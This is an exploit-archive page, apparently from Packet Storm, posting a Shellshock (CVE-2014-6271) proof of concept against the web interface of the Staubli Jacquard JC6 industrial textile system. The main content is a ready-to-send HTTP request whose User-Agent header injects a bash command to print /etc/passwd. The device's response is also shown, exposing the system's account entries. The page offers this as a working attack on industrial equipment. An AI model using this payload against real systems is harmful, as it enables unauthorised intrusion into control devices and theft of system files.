Twenty Year Anniversary

Staubli Jacquard Industrial System JC6 Shellshock

Staubli Jacquard Industrial System JC6 Shellshock
Posted Sep 21, 2018
Authored by t4rkd3vilz

Staubli Jacquard Industrial System JC6 suffers from a bash environment variable handling code injection vulnerability.

tags | exploit, bash
advisories | CVE-2014-6271
MD5 | ab496b513ca8eb64b58bc9279627e7c5

Staubli Jacquard Industrial System JC6 Shellshock

Change Mirror Download
# Exploit Title: Staubli Jacquard Industrial System | GNU Bash Environment
Variable Handling Code Injection (Shellshock)
# Date: 21.09.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.staubli.com
# Software Link:
https://www.staubli.com/tr-tr/textile/textile-machinery-solutions/
# Version:JC6
# CVE: CVE-2014-6271
# Tested on: Linux

----------------------------#PoC#----------------------------

--------------> Request

GET / HTTP/1.1 Host: TargetIP User-Agent: () { test;};echo \"Content-type:
text/plain\"; echo; echo; echo $(</etc/passwd) Pragma: no-cache Accept:
image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

--------------> Response

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf8">
<link href="/staubli.css" rel="stylesheet" type="text/css">
<title>root:!:0:0::/:/usr/bin/ksh daemon:!:1:1::/etc: bin:!:2:2::/bin:
sys:!:3:3::/usr/sys: adm:!:4:4::/var/adm: uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest: nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/: lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh nuucp:*:6:5:uucp login
user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
paul:!:201:1::/home/paul:/usr/bin/ksh jdoe:*:202:1:John
Doe:/home/jdoe:/usr/bin/ksh</title>
</head>
<frameset rows="10%,90%" border=0>
<frameset cols="25%,75%" border=0>
<frame src="logo.html" name="logo" scrolling="no">
<frame src="/cgi-bin/title.cgi" name="title">
</frameset>
<frameset cols="25%,75%" border=0>
<frame src="menu_main.shtml" name="menu">
<frame src="main.shtml" name="main">
</frameset>
</frameset>
<noframe>
<body id="main">
Sorry your navigator doesn't accept frame.
</body>
</noframe>
</html>

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    26 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    2 Files
  • 7
    Oct 7th
    3 Files
  • 8
    Oct 8th
    23 Files
  • 9
    Oct 9th
    16 Files
  • 10
    Oct 10th
    15 Files
  • 11
    Oct 11th
    19 Files
  • 12
    Oct 12th
    16 Files
  • 13
    Oct 13th
    2 Files
  • 14
    Oct 14th
    2 Files
  • 15
    Oct 15th
    15 Files
  • 16
    Oct 16th
    20 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close